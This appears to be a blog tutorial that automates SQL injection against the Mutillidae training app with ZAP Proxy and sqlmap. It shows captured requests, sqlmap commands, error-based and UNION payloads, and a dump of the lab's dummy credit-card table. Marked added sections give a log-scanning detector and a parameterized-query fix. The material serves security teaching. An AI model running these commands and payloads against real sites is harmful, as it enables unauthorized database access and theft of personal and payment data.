A1: 2017 - Injections (Part 3 and Last)

    In my favorite computer game, Quest for Glory 2: Trial by Fire, when the world is once again in danger, the protagonist arrives at the University of Wizards. Once he has passed the entrance examinations, the wise bearded wizards invite him to enroll: after graduating we will understand all the intricacies of magic, learn every spell, and then we will definitely save our friends and defeat the world's evil. The only problem is that the course takes 15-20 years, and in that time the forces of evil will have won, and more than once.

    I involuntarily recall this episode every time I have another interesting book or a pile of technical documentation in front of me. A lot of books have been written about time management, but for me it comes down to a simple formula: figure out the basics, work through the examples, then just automate!

    Now that we have some idea of how injections work, why not make life easier and go through one of the earlier examples again, this time with the help of additional software. We need two tools: sqlmap, a tool that automates the search for and exploitation of SQL injection vulnerabilities, and ZAP Proxy, a local proxy server that is needed to analyze the traffic between the browser and the web server.

    Again, I should mention that these are not the only such tools, and someone in a neighboring blog will surely prove to you that you should use sqlninja instead of sqlmap, and that there is no point wasting time on ZAP when there is Burp. I will not argue with anyone.

    To make life easier, we will start by intercepting the traffic between the client and the web server. The captured data will be used as input for sqlmap. By and large, the URL of the vulnerable application could serve as that input too, but the data from the proxy will be clearer for us.

    We will work with the same example from A1 that we analyzed in the previous article (“SQLi - Extract Data” > “User Info (SQL)”).


    Go to this page through ZAP Proxy and enter some data. I understand that there is a great temptation to try something from what we have already learned, but right now you just need to enter any obviously wrong data. I enter my favorite admin / password and get this request in the interception:

    GET http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=password&user-info-php-submit-button=View+Account+Details HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
    Accept-Language: en-US,en;q=0.5  
    Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php  
    Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega  
    Connection: keep-alive  
    Upgrade-Insecure-Requests: 1  
    Host: 127.0.0.1  
    

    Here we are primarily interested in the first line, namely the request itself. Sometimes it is useful to check that we have intercepted the right thing. This can be done by repeating the captured request in the same browser. If we get the same page with an error, then we are on the right track.

    Let's save our captured request as a separate file, request_sqlmap.txt.

    And now we will pass this file to sqlmap for analysis:

    sqlmap -r request_sqlmap.txt --banner

    We need the --banner parameter so that sqlmap tries to determine which DBMS we are dealing with. In our example this is not so important, but in practice it lets you speed up testing without being distracted by aspects of other DBMSs that do not apply to your target.

    [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests:
    ---
    Parameter: username (GET)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details

        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details
    ---
    [23:20:10] [INFO] the back-end DBMS is MySQL
    [23:20:10] [INFO] fetching banner
    web server operating system: Windows
    web application technology: Apache 2.4.29, PHP 7.2.3
    back-end DBMS: MySQL >= 5.0
    banner: '10.1.31-MariaDB'
    [23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1'
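
    Seen from the server side, a run like the one above leaves its payloads in the access log. The following detection sketch is an added example, not part of the original article or of sqlmap; the log lines, client addresses and date are constructed, the payloads are shortened from the output above, and the rule names are hypothetical. Because the saved browser request is replayed, the User-Agent is Firefox's, so the check looks at decoded parameter values rather than at the client string.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in Apache "combined" format (not real traffic).
# The User-Agent is the browser's, as it is when a saved request is replayed.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
BASE = "/mutillidae/index.php?page=user-info.php&password=password&username="
SAMPLE_LOG = "\n".join(
    f'{ip} - - [01/Jan/2018:23:19:{sec:02d} +0000] "GET {BASE}{user} HTTP/1.1" 200 512 "-" "{UA}"'
    for ip, sec, user in [
        ("10.0.0.5", 1, "admin"),
        ("10.0.0.9", 40, "admin%27%20AND%20%28SELECT%205399%20FROM%28SELECT%20COUNT%28%2A%29%2C"
                         "CONCAT%280x7171707871%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20"
                         "INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29"),
        ("10.0.0.9", 41, "admin%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20GGvT"),
        ("10.0.0.7", 50, "O%27Brien"),  # legitimate value with a quote: must not be flagged
    ]
)

# Patterns taken from the payload shapes in the tool output (rule names are hypothetical).
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "error_based_floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "hex_marker_concat": re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I),
}
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')

def scan(log_text):
    """Return {client_ip: Counter("param:rule" -> hits)} for requests matching a rule."""
    findings = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, _ua = m.groups()
        # parse_qsl percent-decodes each value, so encoded payloads are matched in clear text
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for rule, rx in RULES.items():
                if rx.search(value):
                    findings[ip][f"{name}:{rule}"] += 1
    return dict(findings)

def flagged_by_user_agent(log_text):
    """Naive check for the tool's name in the User-Agent; misses replayed browser headers."""
    return [l.split()[0] for l in log_text.splitlines() if "sqlmap" in l.rsplit('"', 2)[1].lower()]
```

    On the constructed sample, `scan` attributes all four rule hits to the single probing client, while `flagged_by_user_agent` finds nothing.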
    

    The scan completed successfully, and we once again saw what, in general, we already knew:

    [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable

    In addition, sqlmap determined that we are dealing with MySQL, or rather its fork. Now let's see what databases are on the server:

    sqlmap -r request_sqlmap.txt -p username --dbms=MySQL --dbs

    From here on we will pass our captured request file to sqlmap as a parameter. In addition, we will specify the parameters that we already know, such as the type of the DBMS, as well as the --dbs switch, in order to get data about the existing databases:

    [23:27:19] [WARNING] reflective value(s) found and filtering out
    available databases [6]:
    [*] information_schema
    [*] mutillidae
    [*] mysql
    [*] performance_schema
    [*] phpmyadmin
    [*] test


    Fine. Usually, databases are given meaningful names, or they are created automatically when applications are installed. The principle of "security by obscurity" has not been cancelled, of course, but it is the exception rather than the rule. The most interesting thing in our case, apparently, is the mutillidae database; let's see what it consists of:

    sqlmap -r request_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables

    Here we add the database we need and the --tables key to the things we already know, in order to look at the tables in this database:

    [23:29:42] [WARNING] reflective value(s) found and filtering out  
    Database: mutillidae  
    [13 tables]  
    +----------------------------+  
    | accounts                   |  
    | balloon_tips               |  
    | blogs_table                |  
    | captured_data              |  
    | credit_cards               |  
    | help_texts                 |  
    | hitlog                     |  
    | level_1_help_include_files |  
    | page_help                  |  
    | page_hints                 |  
    | pen_test_tools             |  
    | user_poll_results          |  
    | youtubevideos              |  
    +----------------------------+  
    

    Already not bad. The credit_cards table looks especially promising. Let's look into it:

    sqlmap -r request_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --columns

    and get:

    [23:31:35] [WARNING] reflective value(s) found and filtering out
    Database: mutillidae
    Table: credit_cards
    [4 columns]
    +------------+---------+  
    | Column     |   Type  |  
    +------------+---------+  
    | ccid       | int(11) |  
    | ccnumber   | text    |  
    | ccv        | text    |  
    | expiration | date    |   
    +------------+---------+  

    Wow, there is a whole table where credit card data should be stored! Since we are here, let's look at this table:

    sqlmap -r request_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump

    Oops:

    [23:32:42] [WARNING] reflective value(s) found and filtering out  
    Database: mutillidae  
    Table: credit_cards  
    [5 entries]  
    +------+-----+----------------------------+-----------------+  
    | ccid | ccv | ccnumber                   | expiration      |  
    +------+-----+----------------------------+-----------------+  
    | 1    | 745 | 4444111122223333           | 2012-03-01      |
    | 2    | 722 | 7746536337776330           | 2015-04-01      |
    | 3    | 461 | 8242325748474749           | 2016-03-01      |
    | 4    | 230 | 7725653200487633           | 2017-06-01      |
    | 5    | 627 | 1234567812345678           | 2018-11-01      |
    +------+-----+----------------------------+-----------------+  
    

    Here they are, our credit cards. Two questions should now be sounding in your head: how does it work, and where does all this data come from?

    How does it work? Well, strictly speaking, just as if you were going through all the possible options yourself, trying at random to exploit one vulnerability or another.

    As for where the data comes from, that is a question for the administrator who put such important information in such an inappropriate place.
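
    Why the username parameter was injectable, and what closes it, shown as an added example that is not Mutillidae's code: an in-memory SQLite table stands in for the MariaDB accounts table, and the seven-column schema, the stored row and the marker string are assumptions made for the demonstration.

```python
import sqlite3

# Constructed stand-in for the hex-encoded marker the tool wraps around its test value.
MARKER = "qqpxq-constructed-marker-qpjbq"

def make_db():
    """In-memory stand-in for the lab database; the 7-column schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (cid INTEGER PRIMARY KEY, username TEXT, password TEXT,"
               " mysignature TEXT, is_admin TEXT, firstname TEXT, lastname TEXT)")
    db.execute("INSERT INTO accounts VALUES (1, 'admin', 's3cret', 'root', 'TRUE', 'A', 'B')")
    return db

def lookup_concatenated(db, username, password):
    """Vulnerable 'before' form: user input is pasted into the SQL text."""
    sql = f"SELECT * FROM accounts WHERE username='{username}' AND password='{password}'"
    return db.execute(sql).fetchall()

def lookup_bound(db, username, password):
    """Hardened form: values travel as bound parameters and are never parsed as SQL."""
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

# Same shape as the UNION payload in the tool output: the quote closes the string literal,
# seven columns match the original SELECT, and the trailing comment drops the password check.
PAYLOAD = f"admin' UNION ALL SELECT NULL,NULL,NULL,'{MARKER}',NULL,NULL,NULL-- GGvT"

def demo():
    """Run the same input through both forms and return what each query yields."""
    db = make_db()
    return {
        # two rows: the admin record (password never checked) plus the injected marker row
        "concatenated": lookup_concatenated(db, PAYLOAD, "password"),
        # no rows: the whole payload is compared as a literal username
        "bound": lookup_bound(db, PAYLOAD, "password"),
        # the legitimate lookup still works with bound parameters
        "bound_legit": lookup_bound(db, "admin", "s3cret"),
    }

if __name__ == "__main__":
    for form, rows in demo().items():
        print(form, rows)
```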

    sqlmap has dozens of parameters that we cannot cover in one article. But the task of my articles is to introduce the solution, and then it is up to you. Try at your leisure to dig into the other databases as well and experiment with the parameters; perhaps credit cards are not the most interesting thing. =)
